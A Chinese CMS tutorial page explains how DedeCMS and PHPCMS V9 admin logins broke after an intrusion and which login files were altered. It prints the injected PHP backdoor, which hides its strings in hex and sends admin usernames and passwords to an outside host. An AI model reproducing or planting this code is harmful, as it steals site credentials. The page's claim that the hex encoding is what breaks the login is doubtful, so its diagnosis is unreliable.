您现在的位置是:首页 > cms教程 > DedeCMS教程DedeCMS教程
织梦phpcms网站被攻击后台登录不了怎么办
春翠2023-10-07DedeCMS教程已有人查阅
导读之前发现一个服务器的所有网站都出现了后台登陆不进去的情况,本来以为是服务器内存,cpu或者宽带的原因,可是都很正常,为什么登陆不进去呢?不程序下载到本地就正常了
之前发现一个服务器的所有网站都出现了后台登陆不进去的情况,本来以为是服务器内存,cpu或者宽带的原因,可是都很正常,为什么登陆不进去呢?不程序下载到本地就正常了,真奇怪,最终找了一天终于找到了,原来是登陆文件让黑客给修改了,原来是登陆用户名密码让转码成16进制数了,php解析不了,再本地系统有默认的这个编码表,当然能解析了,所以正常;
织梦网站:/include/userlogin.class.php
Phpcms V9:/phpcms/modules/admin/index.php
找个新文件替换下就可以了;
如下是攻击代码:
织梦网站:/include/userlogin.class.php
Phpcms V9:/phpcms/modules/admin/index.php
找个新文件替换下就可以了;
如下是攻击代码:
$sqlhost = "\x77\x77\x77\x2e\x74\x68\x69\x73\x64\x6f\x6f\x72\x2e\x63\x6f\x6d";
$sqlself = "\x2f\x69\x6e\x2f\x61\x70\x69\x2e\x70\x68\x70";
$sqlself .= "\x3f\x76\x61\x72\x3d\x64\x65\x64\x65\x26\x64\x61\x74\x61\x3d";
$sqlself .= bin2hex($_SERVER["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]).'|'.bin2hex($_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\x46"]).'|';
$sqlself .= bin2hex($username).'|'.bin2hex($userpwd);
$sqlport = hexdec(50);
if(function_exists("\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e")) {
$sqlfp = @fsockopen ($sqlhost, $sqlport);
@fputs ($sqlfp, "\x47\x45\x54\x20".$sqlself."\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\r\n\x48\x6f\x73\x74\x3a".$sqlhost."\r\n\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x43\x6c\x6f\x73\x65\r\n\r\n");
@fclose ($sqlfp);
} else {
$context = array("\x68\x74\x74\x70" => array("\x6d\x65\x74\x68\x6f\x64" => "\x47\x45\x54","\x74\x69\x6d\x65\x6f\x75\x74" => 5));
if(function_exists('stream_context_create')) { $stream = @stream_context_create ($context); }
@file_get_contents ("\x68\x74\x74\x70\x3a\x2f\x2f".$sqlhost."\x3a".$sqlport.$sqlself, false, $stream);
}
本文标签:织梦cms后台
很赞哦! ()
上一篇:dedecms织梦删掉版权的方法
下一篇:织梦程序常见漏洞和解决方法
相关教程
- 织梦cms、帝国cms、PHPcms优缺点分析
- PHPCMS和织梦DEDECMS对比分析
- 织梦、phpcms程序添加ftp://、thunder://、flashget:文件下载时
- 织梦cms和PHPcms及帝国cms比较,哪个好?
- 织梦模板怎么套PHPCMS
- PHPCMS与织梦CMS有什么区别呢
- 10个常用的eyoucms易优CMS标签(织梦CMS迁移可用)的方法
- 织梦cms收费哪几款cms可以免费商用?
- dedecms织梦发布内容网站为空白的原因有哪些
- dedecms织梦程序安装后无法修改栏目的解决方法
- 织梦标签{global.cfg_templets_skin}不解析地址的解决方法
- 织梦导航栏栏目被选中状态的代码实例
图文教程
织梦dedecms实现无限数量的交叉副栏目的代码实例
目前织梦dedecms副栏目选择只能选择为9个,但就是有稀奇古怪的客户想选择更多,研究了一下后知道是js调用的问题。下面是修改方法:打开dede/js/m
dedecms织梦模板图片水印怎么设置
我们用dedecms模板做网站的时候,有时需要对图片集添加水印,dedecms主要有两种方式给图片添加水印,即图片和文字方式,那么怎么样修改的一些模板文件以便能方便快捷的添加水印呢?
织梦dede问答模块支持arclist标签的方法
dedecms织梦问答等模块支持arclist标签,实现随机调用其他栏目文章就是让模块模板文件支持调用主站的模板,因为调用主站下的/templets/default/模板
dedecms5.7内容页列表页获取顶级栏目名称的方法和标签
dedecms5.7内容页 列表页获取顶级栏目名称的标签下面是调用顶级栏目名称的方法:
相关源码
-
帝国cms7.5淘宝客电商品牌特价带手机站带会员模板下载为电商品牌特价展示设计的帝国CMS模板,集成PC端与移动端双平台适配。采用瀑布流商品布局,支持品牌分类聚合展示,突出特价促销视觉冲击力。查看源码 -
(自适应)APP应用软件落地页单页推广页网站模板下载基于PbootCMS内核开发的响应式单页模板,为企业产品展示、服务推广等应用场景设计。通过简洁直观的视觉布局与高效的技术架构,帮助用户快速构建专业级落地页面,实现移动端与PC端数据实时同步展示。查看源码 -
响应式艺考培训学校机构pbootcms模板html5源码基于PbootCMS免费开源内核开发,为艺考培训学校与艺术机构设计,替换图文即可快速适配全行业需求。响应式布局兼容手机/PC端,数据实时同步,运维效率提升300%。查看源码 -
(PC+WAP)红色家装设计智能家居家具建材pbootcms网站源码下载本模板基于PbootCMS系统开发,为智能家居、家装设计及家具建材行业设计。采用现代化布局风格,突出家居设计行业特色,适合展示各类家居产品、设计方案和建材信息。查看源码 -
(PC+WAP)蓝色弹簧针厂家探针充电连接器设备网站源码下载基于PbootCMS开发的响应式模板,为弹簧针、探针连接器等电子元器件企业设计。模板采用工业蓝主色调,突出产品技术特性,支持多维度展示连接器产品的规格参数与应用场景,帮助制造企业建立专业线上展示平台。查看源码 -
帝国CMS7.5养生生活健康网模板完整带会员中心可封装APP本套模板为生活服务类网站设计,适用于两性健康、减肥瘦身、生活资讯等领域。采用帝国CMS7.5核心开发,结构清晰合理,视觉体验舒适,能够有效满足相关行业的建站需求。查看源码
| 分享笔记 (共有 篇笔记) |
